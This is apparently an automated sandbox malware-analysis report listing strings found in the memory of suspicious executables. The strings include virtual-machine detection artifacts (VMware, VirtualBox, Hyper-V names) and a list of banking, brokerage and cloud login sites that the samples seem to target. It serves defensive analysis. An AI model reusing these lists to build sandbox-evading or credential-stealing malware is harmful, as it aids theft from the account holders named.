Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000003.2462703968.0000000001DFB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 2012 R2 Microsoft Hyper-V Server
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (core)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000003.2462703968.0000000001DFB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 11 Server Standard without Hyper-V (core)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 8.1 Essential Server Solutions without Hyper-V
Source: 4MZEKMRe7m6bc8qivCccLsq8.exe, 0000000B.00000002.2446122918.0000000003AC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: j7CqemUR9n
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V (core)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Hyper-V (guest)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000003.2462703968.0000000001DFB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000003.2462703968.0000000001DFB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 10 Microsoft Hyper-V Server
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 2012 Essential Server Solutions without Hyper-V
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000D6C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: ~VirtualMachineTypes
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000003.2462703968.0000000001DFB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000D6C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: ]DLL_Loader_VirtualMachine
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000003.2462703968.0000000001DFB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 2016 Microsoft Hyper-V Server
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000D6C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000003.2462703968.0000000001DFB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000003.2462703968.0000000001DFB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: /Windows 2012 R2 Server Standard without Hyper-V
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 11 Server Standard without Hyper-V
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: )Windows 8 Server Standard without Hyper-V
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 11 Server Enterprise without Hyper-V (full)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000003.2462703968.0000000001DFB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (core)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 11 Server Datacenter without Hyper-V (full)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000003.2462703968.0000000001DFB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (core)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: %Windows 2012 Microsoft Hyper-V Server
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Hyper-V
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: $Windows 8.1 Microsoft Hyper-V Server
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: ,Windows 2012 Server Standard without Hyper-V
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000003.2462703968.0000000001DFB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696487552f
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (full)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 2012 Microsoft Hyper-V Server
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (core)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000003.2462703968.0000000001DFB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 8 Essential Server Solutions without Hyper-V
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 10 Essential Server Solutions without Hyper-V
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000003.2462703968.0000000001DFB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2627954517.0000000001CF4000.00000004.00000020.00020000.00000000.sdmp, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2627954517.0000000001D4A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2627954517.0000000001CF4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware6
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 10 Server Standard without Hyper-V (core)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (core)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000003.2462703968.0000000001DFB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: 7Windows 2012 Essential Server Solutions without Hyper-V
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 8 Server Enterprise without Hyper-V (full)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (core)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (full)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000003.2462703968.0000000001DFB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696487552
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (full)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000003.2462703968.0000000001DFB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000003.2462703968.0000000001DFB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: %Windows 2016 Microsoft Hyper-V Server
Source: IVTULQzdBmF3Bc0NeoxSnYvg.exe, 00000007.00000002.3369217163.00000000013E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (full)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000003.2462703968.0000000001DFB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (core)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (core)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: 7Windows 2016 Essential Server Solutions without Hyper-V
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000003.2462703968.0000000001DFB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: +Windows 8.1 Server Standard without Hyper-V
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 2016 Server Standard without Hyper-V
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000003.2462703968.0000000001DFB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (core)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2627954517.0000000001CF4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 11 Server Enterprise without Hyper-V (core)
Source: 4MZEKMRe7m6bc8qivCccLsq8.exe, 0000000B.00000002.2446122918.0000000003AC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CONFIRMORCONTATCAQAHKWFLSJUDUCDQCXZXENUNKRLKFUVJKKXYBVMAONBVPQTKBPDHIJROXQHBKAZGHKYFOLLENYOVCNJFGNEMHUZZAHSTKVYWSHQYDFOSVIJLJRTDDPCUAPIVBUMEYTPZAGILVAQNJLTQSXQHIVBPFESHFVCBREIRYIMCTSPRONKIPASCGDYHJNSDVZGRQJSMFGCPWKJCRPQVESOSTRKWYVORNCHINFYKZZWVFFEAKDTGJPNJBAOUBDUJEBQADEWSPYZNUQQNLLJATNTCGLDSCOWMPRLTGKEOIHDQLIYPDJGHDUXMSZDCSBRTASHQTEICUVCISHLHYGYLZUPUKLRHAURMKHJAPEZUADGZXKBBGSVZGIZLHLJZATTYZUNZCXNHEOMUDBJCGPVGNVEDDRCLNIPDIINWFPBXFWVQSVTNKFHIXKWPWIMBWLMQAKNENBNSDHVWCODSSVGQCCLNXIEEBVUUMQEBIXFKUOHGJWCOJUUYRNLYWVEXLHSAWGLMHTHNDOXZHTDTTAGYVGQZUIZGHWVZMSMGLQOCJMTFTPBZTGMPALXFUCFOYIXZYIQTRVEHZJMKGHQKTDRVVLRSWADBHJBEHDGUIHICXWBEQAVALJNYQCAETLTEZPXZMWGOIJHNMDQHLQCNBSMMUVGZFNXFNBHGLNOZWXPDFZJLSAJBYQCPPEPEHFCVPTXAYAMOVMWRVYBFLPLKVJKTMNYOQXLBXTTNFAAKAMESTFBYIIKIZUOOCEYAYNXORXOFFCYCRGLUAVJSKMRKKDAQZMBHVVAUMTYSTAIPBTVJUZDEHCANHZFVTFXLTODHGKFUACOFVOSSOAMQQQZYVGHCGIZZQSVWAYNSSWAVDWOKWDNXKZGCQNPNEICHCOIOLUMYIFIWQNEWYQKFJQFQTTJTVDWIFMQMWLOVNBTXQKTRXVBPYVMCIAUQZVOLOUPKSQEDBGUMDGZHZNQAFFMSQWMZAHKTWKMTVTVBMINMEZYPYEZMKLRNOLXJFNGNKTDZHPFBPWUKPTZETYIVHZLMQBRUKEJAUSVFXNSDZFLXVAQBEDZOWFJBZRGFBPQYWJIHNZOLZOZYSPYWZRNHGERDJNLDRVYBDXNBPRBLVANDFQVAXBWIAOVROHQESSNNTTVCJIESZAUWSRNEGNYKNYQAXKOHJZTUTNMAZSSSQVNBCBBOPCLJDAJAQDTCAYYGRCEAGPLAZKKVBGDAJCPIWVEYFAVYLHZCJDIGCXLDQBMVVUBYGVDJKPIPXCGNKBRFBGRENPQZYHELFDYQCOJUCELVNNZJRQVLROCUKDTVCCNWMZROBOZWWATAPQVVXNMUCRIYBYWFYUJSOHJBZASWQRZYFQLCPYCTGGXPMMCTHHJSKCZVCGNBRDOZOUEWQPGTKVUKRCPUKUNBWYUYAHZAQZRMNOOOKMXFJQZIHZQVDJJFUZJEOUTHRXDFZZJXTWLRKIOOHKKVIORBIMZXVWSKBRVCYUFMNCMRWSYForm1ResourcesfxYgZM.My.ResourcesMySettingsMySettingsPropertyUserControl1Microsoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceSystem.Windows.FormsFormDisposedisposingTableLayoutPanel_TableLayoutPanelget_TableLayoutPanelset_TableLayoutPanelWithEventsValuePictureBox_LogoPictureBoxget_LogoPictureBoxset_LogoPictureBoxLabel_LabelProductNameget_LabelProductNameset_LabelProductName_LabelVersionget_LabelVersionset_LabelVersion_LabelCompanyNameget_LabelCompanyNameset_LabelCompanyNameTextBox_TextBoxDescriptionget_TextBoxDescriptionset_TextBoxDescriptionButton_OKButtonget_OKButtonset_OKButton_LabelCopyrightget_LabelCopyrightset_LabelCopyrightSystem.ComponentModelIContainercomponentsInitializeComponentEventArgsAboutBox1_LoadsendereOKButton_ClickLogoPictureBoxLabelProductNameLabelVersionLabelCompanyNameTextBoxDescriptionOKButtonLabelCopyright
Source: svchost.exe, 00000004.00000002.3354285175.000002BAA7A32000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 11 Server Datacenter without Hyper-V (core)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (full)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (full)
Source: svchost.exe, 00000004.00000002.3354285175.000002BAA7A32000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000&00000
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (core)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 10 Server Enterprise without Hyper-V (core)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000003.2462703968.0000000001DFB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 10 Server Datacenter without Hyper-V (full)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: :Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000003.2462703968.0000000001DFB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: 5Windows 11 Essential Server Solutions without Hyper-V
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 2016 Server Standard without Hyper-V (core)
Source: svchost.exe, 00000004.00000003.2112702785.000002BAA7A44000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 8 Server Standard without Hyper-V (core)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: 5Windows 10 Essential Server Solutions without Hyper-V
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: xVBoxService.exe
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (core)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (full)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (full)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 8 Server Enterprise without Hyper-V (core)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: *Windows 11 Server Standard without Hyper-V
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: ,Windows 2016 Server Standard without Hyper-V
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 2012 Server Standard without Hyper-V (core)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (core)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 8 Server Datacenter without Hyper-V (full)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (full)
